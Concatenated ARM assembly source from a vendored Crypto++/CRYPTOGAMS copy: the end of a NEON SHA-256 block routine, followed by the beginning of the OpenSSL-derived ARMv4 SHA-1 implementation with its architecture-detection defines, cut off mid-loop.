eor r0,r11,r11,ror#11
vsli.32 d24,d7,#15
eor r2,r2,r9
add r10,r10,r3,ror#6
vshr.u32 d25,d7,#10
eor r3,r11,r4
eor r0,r0,r11,ror#20
vadd.i32 q0,q0,q9
add r10,r10,r2
ldr r2,[sp,#8]
veor d25,d25,d24
and r12,r12,r3
add r6,r6,r10
vshr.u32 d24,d7,#19
add r10,r10,r0,ror#2
eor r12,r12,r4
vsli.32 d24,d7,#13
add r9,r9,r2
eor r2,r7,r8
veor d25,d25,d24
eor r0,r6,r6,ror#5
add r10,r10,r12
vadd.i32 d0,d0,d25
and r2,r2,r6
eor r12,r0,r6,ror#19
vshr.u32 d24,d0,#17
eor r0,r10,r10,ror#11
eor r2,r2,r8
vsli.32 d24,d0,#15
add r9,r9,r12,ror#6
eor r12,r10,r11
vshr.u32 d25,d0,#10
eor r0,r0,r10,ror#20
add r9,r9,r2
veor d25,d25,d24
ldr r2,[sp,#12]
and r3,r3,r12
vshr.u32 d24,d0,#19
add r5,r5,r9
add r9,r9,r0,ror#2
eor r3,r3,r11
vld1.32 {q8},[r14,:128]!
add r8,r8,r2
vsli.32 d24,d0,#13
eor r2,r6,r7
eor r0,r5,r5,ror#5
veor d25,d25,d24
add r9,r9,r3
and r2,r2,r5
vadd.i32 d1,d1,d25
eor r3,r0,r5,ror#19
eor r0,r9,r9,ror#11
vadd.i32 q8,q8,q0
eor r2,r2,r7
add r8,r8,r3,ror#6
eor r3,r9,r10
eor r0,r0,r9,ror#20
add r8,r8,r2
ldr r2,[sp,#16]
and r12,r12,r3
add r4,r4,r8
vst1.32 {q8},[r1,:128]!
add r8,r8,r0,ror#2
eor r12,r12,r10
vext.8 q8,q1,q2,#4
add r7,r7,r2
eor r2,r5,r6
eor r0,r4,r4,ror#5
vext.8 q9,q3,q0,#4
add r8,r8,r12
and r2,r2,r4
eor r12,r0,r4,ror#19
vshr.u32 q10,q8,#7
eor r0,r8,r8,ror#11
eor r2,r2,r6
vadd.i32 q1,q1,q9
add r7,r7,r12,ror#6
eor r12,r8,r9
vshr.u32 q9,q8,#3
eor r0,r0,r8,ror#20
add r7,r7,r2
vsli.32 q10,q8,#25
ldr r2,[sp,#20]
and r3,r3,r12
vshr.u32 q11,q8,#18
add r11,r11,r7
add r7,r7,r0,ror#2
eor r3,r3,r9
veor q9,q9,q10
add r6,r6,r2
vsli.32 q11,q8,#14
eor r2,r4,r5
eor r0,r11,r11,ror#5
vshr.u32 d24,d1,#17
add r7,r7,r3
and r2,r2,r11
veor q9,q9,q11
eor r3,r0,r11,ror#19
eor r0,r7,r7,ror#11
vsli.32 d24,d1,#15
eor r2,r2,r5
add r6,r6,r3,ror#6
vshr.u32 d25,d1,#10
eor r3,r7,r8
eor r0,r0,r7,ror#20
vadd.i32 q1,q1,q9
add r6,r6,r2
ldr r2,[sp,#24]
veor d25,d25,d24
and r12,r12,r3
add r10,r10,r6
vshr.u32 d24,d1,#19
add r6,r6,r0,ror#2
eor r12,r12,r8
vsli.32 d24,d1,#13
add r5,r5,r2
eor r2,r11,r4
veor d25,d25,d24
eor r0,r10,r10,ror#5
add r6,r6,r12
vadd.i32 d2,d2,d25
and r2,r2,r10
eor r12,r0,r10,ror#19
vshr.u32 d24,d2,#17
eor r0,r6,r6,ror#11
eor r2,r2,r4
vsli.32 d24,d2,#15
add r5,r5,r12,ror#6
eor r12,r6,r7
vshr.u32 d25,d2,#10
eor r0,r0,r6,ror#20
add r5,r5,r2
veor d25,d25,d24
ldr r2,[sp,#28]
and r3,r3,r12
vshr.u32 d24,d2,#19
add r9,r9,r5
add r5,r5,r0,ror#2
eor r3,r3,r7
vld1.32 {q8},[r14,:128]!
add r4,r4,r2
vsli.32 d24,d2,#13
eor r2,r10,r11
eor r0,r9,r9,ror#5
veor d25,d25,d24
add r5,r5,r3
and r2,r2,r9
vadd.i32 d3,d3,d25
eor r3,r0,r9,ror#19
eor r0,r5,r5,ror#11
vadd.i32 q8,q8,q1
eor r2,r2,r11
add r4,r4,r3,ror#6
eor r3,r5,r6
eor r0,r0,r5,ror#20
add r4,r4,r2
ldr r2,[sp,#32]
and r12,r12,r3
add r8,r8,r4
vst1.32 {q8},[r1,:128]!
add r4,r4,r0,ror#2
eor r12,r12,r6
vext.8 q8,q2,q3,#4
add r11,r11,r2
eor r2,r9,r10
eor r0,r8,r8,ror#5
vext.8 q9,q0,q1,#4
add r4,r4,r12
and r2,r2,r8
eor r12,r0,r8,ror#19
vshr.u32 q10,q8,#7
eor r0,r4,r4,ror#11
eor r2,r2,r10
vadd.i32 q2,q2,q9
add r11,r11,r12,ror#6
eor r12,r4,r5
vshr.u32 q9,q8,#3
eor r0,r0,r4,ror#20
add r11,r11,r2
vsli.32 q10,q8,#25
ldr r2,[sp,#36]
and r3,r3,r12
vshr.u32 q11,q8,#18
add r7,r7,r11
add r11,r11,r0,ror#2
eor r3,r3,r5
veor q9,q9,q10
add r10,r10,r2
vsli.32 q11,q8,#14
eor r2,r8,r9
eor r0,r7,r7,ror#5
vshr.u32 d24,d3,#17
add r11,r11,r3
and r2,r2,r7
veor q9,q9,q11
eor r3,r0,r7,ror#19
eor r0,r11,r11,ror#11
vsli.32 d24,d3,#15
eor r2,r2,r9
add r10,r10,r3,ror#6
vshr.u32 d25,d3,#10
eor r3,r11,r4
eor r0,r0,r11,ror#20
vadd.i32 q2,q2,q9
add r10,r10,r2
ldr r2,[sp,#40]
veor d25,d25,d24
and r12,r12,r3
add r6,r6,r10
vshr.u32 d24,d3,#19
add r10,r10,r0,ror#2
eor r12,r12,r4
vsli.32 d24,d3,#13
add r9,r9,r2
eor r2,r7,r8
veor d25,d25,d24
eor r0,r6,r6,ror#5
add r10,r10,r12
vadd.i32 d4,d4,d25
and r2,r2,r6
eor r12,r0,r6,ror#19
vshr.u32 d24,d4,#17
eor r0,r10,r10,ror#11
eor r2,r2,r8
vsli.32 d24,d4,#15
add r9,r9,r12,ror#6
eor r12,r10,r11
vshr.u32 d25,d4,#10
eor r0,r0,r10,ror#20
add r9,r9,r2
veor d25,d25,d24
ldr r2,[sp,#44]
and r3,r3,r12
vshr.u32 d24,d4,#19
add r5,r5,r9
add r9,r9,r0,ror#2
eor r3,r3,r11
vld1.32 {q8},[r14,:128]!
add r8,r8,r2
vsli.32 d24,d4,#13
eor r2,r6,r7
eor r0,r5,r5,ror#5
veor d25,d25,d24
add r9,r9,r3
and r2,r2,r5
vadd.i32 d5,d5,d25
eor r3,r0,r5,ror#19
eor r0,r9,r9,ror#11
vadd.i32 q8,q8,q2
eor r2,r2,r7
add r8,r8,r3,ror#6
eor r3,r9,r10
eor r0,r0,r9,ror#20
add r8,r8,r2
ldr r2,[sp,#48]
and r12,r12,r3
add r4,r4,r8
vst1.32 {q8},[r1,:128]!
add r8,r8,r0,ror#2
eor r12,r12,r10
vext.8 q8,q3,q0,#4
add r7,r7,r2
eor r2,r5,r6
eor r0,r4,r4,ror#5
vext.8 q9,q1,q2,#4
add r8,r8,r12
and r2,r2,r4
eor r12,r0,r4,ror#19
vshr.u32 q10,q8,#7
eor r0,r8,r8,ror#11
eor r2,r2,r6
vadd.i32 q3,q3,q9
add r7,r7,r12,ror#6
eor r12,r8,r9
vshr.u32 q9,q8,#3
eor r0,r0,r8,ror#20
add r7,r7,r2
vsli.32 q10,q8,#25
ldr r2,[sp,#52]
and r3,r3,r12
vshr.u32 q11,q8,#18
add r11,r11,r7
add r7,r7,r0,ror#2
eor r3,r3,r9
veor q9,q9,q10
add r6,r6,r2
vsli.32 q11,q8,#14
eor r2,r4,r5
eor r0,r11,r11,ror#5
vshr.u32 d24,d5,#17
add r7,r7,r3
and r2,r2,r11
veor q9,q9,q11
eor r3,r0,r11,ror#19
eor r0,r7,r7,ror#11
vsli.32 d24,d5,#15
eor r2,r2,r5
add r6,r6,r3,ror#6
vshr.u32 d25,d5,#10
eor r3,r7,r8
eor r0,r0,r7,ror#20
vadd.i32 q3,q3,q9
add r6,r6,r2
ldr r2,[sp,#56]
veor d25,d25,d24
and r12,r12,r3
add r10,r10,r6
vshr.u32 d24,d5,#19
add r6,r6,r0,ror#2
eor r12,r12,r8
vsli.32 d24,d5,#13
add r5,r5,r2
eor r2,r11,r4
veor d25,d25,d24
eor r0,r10,r10,ror#5
add r6,r6,r12
vadd.i32 d6,d6,d25
and r2,r2,r10
eor r12,r0,r10,ror#19
vshr.u32 d24,d6,#17
eor r0,r6,r6,ror#11
eor r2,r2,r4
vsli.32 d24,d6,#15
add r5,r5,r12,ror#6
eor r12,r6,r7
vshr.u32 d25,d6,#10
eor r0,r0,r6,ror#20
add r5,r5,r2
veor d25,d25,d24
ldr r2,[sp,#60]
and r3,r3,r12
vshr.u32 d24,d6,#19
add r9,r9,r5
add r5,r5,r0,ror#2
eor r3,r3,r7
vld1.32 {q8},[r14,:128]!
add r4,r4,r2
vsli.32 d24,d6,#13
eor r2,r10,r11
eor r0,r9,r9,ror#5
veor d25,d25,d24
add r5,r5,r3
and r2,r2,r9
vadd.i32 d7,d7,d25
eor r3,r0,r9,ror#19
eor r0,r5,r5,ror#11
vadd.i32 q8,q8,q3
eor r2,r2,r11
add r4,r4,r3,ror#6
eor r3,r5,r6
eor r0,r0,r5,ror#20
add r4,r4,r2
ldr r2,[r14]
and r12,r12,r3
add r8,r8,r4
vst1.32 {q8},[r1,:128]!
add r4,r4,r0,ror#2
eor r12,r12,r6
teq r2,#0 @ check for K256 terminator
ldr r2,[sp,#0]
sub r1,r1,#64
bne .L_00_48
ldr r1,[sp,#68]
ldr r0,[sp,#72]
sub r14,r14,#256 @ rewind r14
teq r1,r0
it eq
subeq r1,r1,#64 @ avoid SEGV
vld1.8 {q0},[r1]! @ load next input block
vld1.8 {q1},[r1]!
vld1.8 {q2},[r1]!
vld1.8 {q3},[r1]!
it ne
strne r1,[sp,#68]
mov r1,sp
add r11,r11,r2
eor r2,r9,r10
eor r0,r8,r8,ror#5
add r4,r4,r12
vld1.32 {q8},[r14,:128]!
and r2,r2,r8
eor r12,r0,r8,ror#19
eor r0,r4,r4,ror#11
eor r2,r2,r10
vrev32.8 q0,q0
add r11,r11,r12,ror#6
eor r12,r4,r5
eor r0,r0,r4,ror#20
add r11,r11,r2
vadd.i32 q8,q8,q0
ldr r2,[sp,#4]
and r3,r3,r12
add r7,r7,r11
add r11,r11,r0,ror#2
eor r3,r3,r5
add r10,r10,r2
eor r2,r8,r9
eor r0,r7,r7,ror#5
add r11,r11,r3
and r2,r2,r7
eor r3,r0,r7,ror#19
eor r0,r11,r11,ror#11
eor r2,r2,r9
add r10,r10,r3,ror#6
eor r3,r11,r4
eor r0,r0,r11,ror#20
add r10,r10,r2
ldr r2,[sp,#8]
and r12,r12,r3
add r6,r6,r10
add r10,r10,r0,ror#2
eor r12,r12,r4
add r9,r9,r2
eor r2,r7,r8
eor r0,r6,r6,ror#5
add r10,r10,r12
and r2,r2,r6
eor r12,r0,r6,ror#19
eor r0,r10,r10,ror#11
eor r2,r2,r8
add r9,r9,r12,ror#6
eor r12,r10,r11
eor r0,r0,r10,ror#20
add r9,r9,r2
ldr r2,[sp,#12]
and r3,r3,r12
add r5,r5,r9
add r9,r9,r0,ror#2
eor r3,r3,r11
add r8,r8,r2
eor r2,r6,r7
eor r0,r5,r5,ror#5
add r9,r9,r3
and r2,r2,r5
eor r3,r0,r5,ror#19
eor r0,r9,r9,ror#11
eor r2,r2,r7
add r8,r8,r3,ror#6
eor r3,r9,r10
eor r0,r0,r9,ror#20
add r8,r8,r2
ldr r2,[sp,#16]
and r12,r12,r3
add r4,r4,r8
add r8,r8,r0,ror#2
eor r12,r12,r10
vst1.32 {q8},[r1,:128]!
add r7,r7,r2
eor r2,r5,r6
eor r0,r4,r4,ror#5
add r8,r8,r12
vld1.32 {q8},[r14,:128]!
and r2,r2,r4
eor r12,r0,r4,ror#19
eor r0,r8,r8,ror#11
eor r2,r2,r6
vrev32.8 q1,q1
add r7,r7,r12,ror#6
eor r12,r8,r9
eor r0,r0,r8,ror#20
add r7,r7,r2
vadd.i32 q8,q8,q1
ldr r2,[sp,#20]
and r3,r3,r12
add r11,r11,r7
add r7,r7,r0,ror#2
eor r3,r3,r9
add r6,r6,r2
eor r2,r4,r5
eor r0,r11,r11,ror#5
add r7,r7,r3
and r2,r2,r11
eor r3,r0,r11,ror#19
eor r0,r7,r7,ror#11
eor r2,r2,r5
add r6,r6,r3,ror#6
eor r3,r7,r8
eor r0,r0,r7,ror#20
add r6,r6,r2
ldr r2,[sp,#24]
and r12,r12,r3
add r10,r10,r6
add r6,r6,r0,ror#2
eor r12,r12,r8
add r5,r5,r2
eor r2,r11,r4
eor r0,r10,r10,ror#5
add r6,r6,r12
and r2,r2,r10
eor r12,r0,r10,ror#19
eor r0,r6,r6,ror#11
eor r2,r2,r4
add r5,r5,r12,ror#6
eor r12,r6,r7
eor r0,r0,r6,ror#20
add r5,r5,r2
ldr r2,[sp,#28]
and r3,r3,r12
add r9,r9,r5
add r5,r5,r0,ror#2
eor r3,r3,r7
add r4,r4,r2
eor r2,r10,r11
eor r0,r9,r9,ror#5
add r5,r5,r3
and r2,r2,r9
eor r3,r0,r9,ror#19
eor r0,r5,r5,ror#11
eor r2,r2,r11
add r4,r4,r3,ror#6
eor r3,r5,r6
eor r0,r0,r5,ror#20
add r4,r4,r2
ldr r2,[sp,#32]
and r12,r12,r3
add r8,r8,r4
add r4,r4,r0,ror#2
eor r12,r12,r6
vst1.32 {q8},[r1,:128]!
add r11,r11,r2
eor r2,r9,r10
eor r0,r8,r8,ror#5
add r4,r4,r12
vld1.32 {q8},[r14,:128]!
and r2,r2,r8
eor r12,r0,r8,ror#19
eor r0,r4,r4,ror#11
eor r2,r2,r10
vrev32.8 q2,q2
add r11,r11,r12,ror#6
eor r12,r4,r5
eor r0,r0,r4,ror#20
add r11,r11,r2
vadd.i32 q8,q8,q2
ldr r2,[sp,#36]
and r3,r3,r12
add r7,r7,r11
add r11,r11,r0,ror#2
eor r3,r3,r5
add r10,r10,r2
eor r2,r8,r9
eor r0,r7,r7,ror#5
add r11,r11,r3
and r2,r2,r7
eor r3,r0,r7,ror#19
eor r0,r11,r11,ror#11
eor r2,r2,r9
add r10,r10,r3,ror#6
eor r3,r11,r4
eor r0,r0,r11,ror#20
add r10,r10,r2
ldr r2,[sp,#40]
and r12,r12,r3
add r6,r6,r10
add r10,r10,r0,ror#2
eor r12,r12,r4
add r9,r9,r2
eor r2,r7,r8
eor r0,r6,r6,ror#5
add r10,r10,r12
and r2,r2,r6
eor r12,r0,r6,ror#19
eor r0,r10,r10,ror#11
eor r2,r2,r8
add r9,r9,r12,ror#6
eor r12,r10,r11
eor r0,r0,r10,ror#20
add r9,r9,r2
ldr r2,[sp,#44]
and r3,r3,r12
add r5,r5,r9
add r9,r9,r0,ror#2
eor r3,r3,r11
add r8,r8,r2
eor r2,r6,r7
eor r0,r5,r5,ror#5
add r9,r9,r3
and r2,r2,r5
eor r3,r0,r5,ror#19
eor r0,r9,r9,ror#11
eor r2,r2,r7
add r8,r8,r3,ror#6
eor r3,r9,r10
eor r0,r0,r9,ror#20
add r8,r8,r2
ldr r2,[sp,#48]
and r12,r12,r3
add r4,r4,r8
add r8,r8,r0,ror#2
eor r12,r12,r10
vst1.32 {q8},[r1,:128]!
add r7,r7,r2
eor r2,r5,r6
eor r0,r4,r4,ror#5
add r8,r8,r12
vld1.32 {q8},[r14,:128]!
and r2,r2,r4
eor r12,r0,r4,ror#19
eor r0,r8,r8,ror#11
eor r2,r2,r6
vrev32.8 q3,q3
add r7,r7,r12,ror#6
eor r12,r8,r9
eor r0,r0,r8,ror#20
add r7,r7,r2
vadd.i32 q8,q8,q3
ldr r2,[sp,#52]
and r3,r3,r12
add r11,r11,r7
add r7,r7,r0,ror#2
eor r3,r3,r9
add r6,r6,r2
eor r2,r4,r5
eor r0,r11,r11,ror#5
add r7,r7,r3
and r2,r2,r11
eor r3,r0,r11,ror#19
eor r0,r7,r7,ror#11
eor r2,r2,r5
add r6,r6,r3,ror#6
eor r3,r7,r8
eor r0,r0,r7,ror#20
add r6,r6,r2
ldr r2,[sp,#56]
and r12,r12,r3
add r10,r10,r6
add r6,r6,r0,ror#2
eor r12,r12,r8
add r5,r5,r2
eor r2,r11,r4
eor r0,r10,r10,ror#5
add r6,r6,r12
and r2,r2,r10
eor r12,r0,r10,ror#19
eor r0,r6,r6,ror#11
eor r2,r2,r4
add r5,r5,r12,ror#6
eor r12,r6,r7
eor r0,r0,r6,ror#20
add r5,r5,r2
ldr r2,[sp,#60]
and r3,r3,r12
add r9,r9,r5
add r5,r5,r0,ror#2
eor r3,r3,r7
add r4,r4,r2
eor r2,r10,r11
eor r0,r9,r9,ror#5
add r5,r5,r3
and r2,r2,r9
eor r3,r0,r9,ror#19
eor r0,r5,r5,ror#11
eor r2,r2,r11
add r4,r4,r3,ror#6
eor r3,r5,r6
eor r0,r0,r5,ror#20
add r4,r4,r2
ldr r2,[sp,#64]
and r12,r12,r3
add r8,r8,r4
add r4,r4,r0,ror#2
eor r12,r12,r6
vst1.32 {q8},[r1,:128]!
ldr r0,[r2,#0]
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
ldr r12,[r2,#4]
ldr r3,[r2,#8]
ldr r1,[r2,#12]
add r4,r4,r0 @ accumulate
ldr r0,[r2,#16]
add r5,r5,r12
ldr r12,[r2,#20]
add r6,r6,r3
ldr r3,[r2,#24]
add r7,r7,r1
ldr r1,[r2,#28]
add r8,r8,r0
str r4,[r2],#4
add r9,r9,r12
str r5,[r2],#4
add r10,r10,r3
str r6,[r2],#4
add r11,r11,r1
str r7,[r2],#4
stmia r2,{r8,r9,r10,r11}
ittte ne
movne r1,sp
ldrne r2,[sp,#0]
eorne r12,r12,r12
ldreq sp,[sp,#76] @ restore original sp
itt ne
eorne r3,r5,r6
bne .L_00_48
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
.size cryptogams_sha256_block_data_order_neon,.-cryptogams_sha256_block_data_order_neon
#endif
|
Akhil-Sharma-26/yeet
| 29,134
|
external/cryptopp/sha1_armv4.S
|
@ Copyright 2007-2019 The OpenSSL Project Authors. All Rights Reserved.
@
@ ====================================================================
@ Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
@ project. The module is, however, dual licensed under OpenSSL and
@ CRYPTOGAMS licenses depending on where you obtain it. For further
@ details see http://www.openssl.org/~appro/cryptogams/.
@ ====================================================================
@ JW, MAY 2019: Begin defines from taken from arm_arch.h
@ The defines were included through the header.
# if !defined(__ARM_ARCH__)
# if defined(__CC_ARM)
# define __ARM_ARCH__ __TARGET_ARCH_ARM
# if defined(__BIG_ENDIAN)
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__GNUC__)
# if defined(__aarch64__)
# define __ARM_ARCH__ 8
# if __BYTE_ORDER__==__ORDER_BIG_ENDIAN__
# define __ARMEB__
# else
# define __ARMEL__
# endif
# elif defined(__ARM_ARCH)
# define __ARM_ARCH__ __ARM_ARCH
# elif defined(__ARM_ARCH_8A__)
# define __ARM_ARCH__ 8
# elif defined(__ARM_ARCH_7__) || defined(__ARM_ARCH_7A__) || \
defined(__ARM_ARCH_7R__)|| defined(__ARM_ARCH_7M__) || \
defined(__ARM_ARCH_7EM__)
# define __ARM_ARCH__ 7
# elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6J__) || \
defined(__ARM_ARCH_6K__)|| defined(__ARM_ARCH_6M__) || \
defined(__ARM_ARCH_6Z__)|| defined(__ARM_ARCH_6ZK__) || \
defined(__ARM_ARCH_6T2__)
# define __ARM_ARCH__ 6
# elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5T__) || \
defined(__ARM_ARCH_5E__)|| defined(__ARM_ARCH_5TE__) || \
defined(__ARM_ARCH_5TEJ__)
# define __ARM_ARCH__ 5
# elif defined(__ARM_ARCH_4__) || defined(__ARM_ARCH_4T__)
# define __ARM_ARCH__ 4
# else
# error "unsupported ARM architecture"
# endif
# endif
# endif
# if !defined(__ARM_MAX_ARCH__)
# define __ARM_MAX_ARCH__ __ARM_ARCH__
# endif
# if __ARM_MAX_ARCH__<__ARM_ARCH__
# error "__ARM_MAX_ARCH__ can't be less than __ARM_ARCH__"
# elif __ARM_MAX_ARCH__!=__ARM_ARCH__
# if __ARM_ARCH__<7 && __ARM_MAX_ARCH__>=7 && defined(__ARMEB__)
# error "can't build universal big-endian binary"
# endif
# endif
# define CRYPTOGAMS_ARMV7_NEON (1<<0)
@ JW, MAY 2019: End defines from taken from arm_arch.h
@ Back to original Cryptogams code
#if defined(__thumb2__)
.syntax unified
.thumb
#else
.code 32
#endif
.text
.align 5
.globl cryptogams_sha1_block_data_order
.type cryptogams_sha1_block_data_order,%function
cryptogams_sha1_block_data_order:
.Lcryptogams_sha1_block_data_order:
#if __ARM_ARCH__<7 && !defined(__thumb2__)
sub r3,pc,#8 @ cryptogams_sha1_block_data_order
#else
adr r3,.Lcryptogams_sha1_block_data_order
#endif
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
add r2,r1,r2,lsl#6 @ r2 to point at the end of r1
ldmia r0,{r3,r4,r5,r6,r7}
.Lloop:
ldr r8,.LK_00_19
mov r14,sp
sub sp,sp,#15*4
mov r5,r5,ror#30
mov r6,r6,ror#30
mov r7,r7,ror#30 @ [6]
.L_00_15:
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r7,r8,r7,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r5,r6 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r7,r8,r7,ror#2 @ E+=K_00_19
eor r10,r5,r6 @ F_xx_xx
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r4,r10,ror#2
add r7,r7,r9 @ E+=X[i]
eor r10,r10,r6,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r7,r7,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r6,r8,r6,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r4,r5 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r6,r8,r6,ror#2 @ E+=K_00_19
eor r10,r4,r5 @ F_xx_xx
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r3,r10,ror#2
add r6,r6,r9 @ E+=X[i]
eor r10,r10,r5,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r6,r6,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r5,r8,r5,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r3,r4 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r5,r8,r5,ror#2 @ E+=K_00_19
eor r10,r3,r4 @ F_xx_xx
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r7,r10,ror#2
add r5,r5,r9 @ E+=X[i]
eor r10,r10,r4,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r5,r5,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r4,r8,r4,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r7,r3 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r4,r8,r4,ror#2 @ E+=K_00_19
eor r10,r7,r3 @ F_xx_xx
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r6,r10,ror#2
add r4,r4,r9 @ E+=X[i]
eor r10,r10,r3,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r4,r4,r10 @ E+=F_00_19(B,C,D)
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r3,r8,r3,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r6,r7 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r3,r8,r3,ror#2 @ E+=K_00_19
eor r10,r6,r7 @ F_xx_xx
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r5,r10,ror#2
add r3,r3,r9 @ E+=X[i]
eor r10,r10,r7,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r3,r3,r10 @ E+=F_00_19(B,C,D)
#if defined(__thumb2__)
mov r12,sp
teq r14,r12
#else
teq r14,sp
#endif
bne .L_00_15 @ [((11+4)*5+2)*3]
sub sp,sp,#25*4
#if __ARM_ARCH__<7
ldrb r10,[r1,#2]
ldrb r9,[r1,#3]
ldrb r11,[r1,#1]
add r7,r8,r7,ror#2 @ E+=K_00_19
ldrb r12,[r1],#4
orr r9,r9,r10,lsl#8
eor r10,r5,r6 @ F_xx_xx
orr r9,r9,r11,lsl#16
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
orr r9,r9,r12,lsl#24
#else
ldr r9,[r1],#4 @ handles unaligned
add r7,r8,r7,ror#2 @ E+=K_00_19
eor r10,r5,r6 @ F_xx_xx
add r7,r7,r3,ror#27 @ E+=ROR(A,27)
#ifdef __ARMEL__
rev r9,r9 @ byte swap
#endif
#endif
and r10,r4,r10,ror#2
add r7,r7,r9 @ E+=X[i]
eor r10,r10,r6,ror#2 @ F_00_19(B,C,D)
str r9,[r14,#-4]!
add r7,r7,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r6,r8,r6,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r4,r5 @ F_xx_xx
mov r9,r9,ror#31
add r6,r6,r7,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r3,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r6,r6,r9 @ E+=X[i]
eor r10,r10,r5,ror#2 @ F_00_19(B,C,D)
add r6,r6,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r5,r8,r5,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r3,r4 @ F_xx_xx
mov r9,r9,ror#31
add r5,r5,r6,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r7,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r5,r5,r9 @ E+=X[i]
eor r10,r10,r4,ror#2 @ F_00_19(B,C,D)
add r5,r5,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r4,r8,r4,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r7,r3 @ F_xx_xx
mov r9,r9,ror#31
add r4,r4,r5,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r6,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r4,r4,r9 @ E+=X[i]
eor r10,r10,r3,ror#2 @ F_00_19(B,C,D)
add r4,r4,r10 @ E+=F_00_19(B,C,D)
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
add r3,r8,r3,ror#2 @ E+=K_xx_xx
ldr r12,[r14,#2*4]
eor r9,r9,r10
eor r11,r11,r12 @ 1 cycle stall
eor r10,r6,r7 @ F_xx_xx
mov r9,r9,ror#31
add r3,r3,r4,ror#27 @ E+=ROR(A,27)
eor r9,r9,r11,ror#31
str r9,[r14,#-4]!
and r10,r5,r10,ror#2 @ F_xx_xx
@ F_xx_xx
add r3,r3,r9 @ E+=X[i]
eor r10,r10,r7,ror#2 @ F_00_19(B,C,D)
add r3,r3,r10 @ E+=F_00_19(B,C,D)
ldr r8,.LK_20_39 @ [+15+16*4]
cmn sp,#0 @ [+3], clear carry to denote 20_39
.L_20_39_or_60_79:
ldr r9,[r14,#15*4]
ldr r10,[r14,#13*4]
ldr r11,[r14,#7*4]
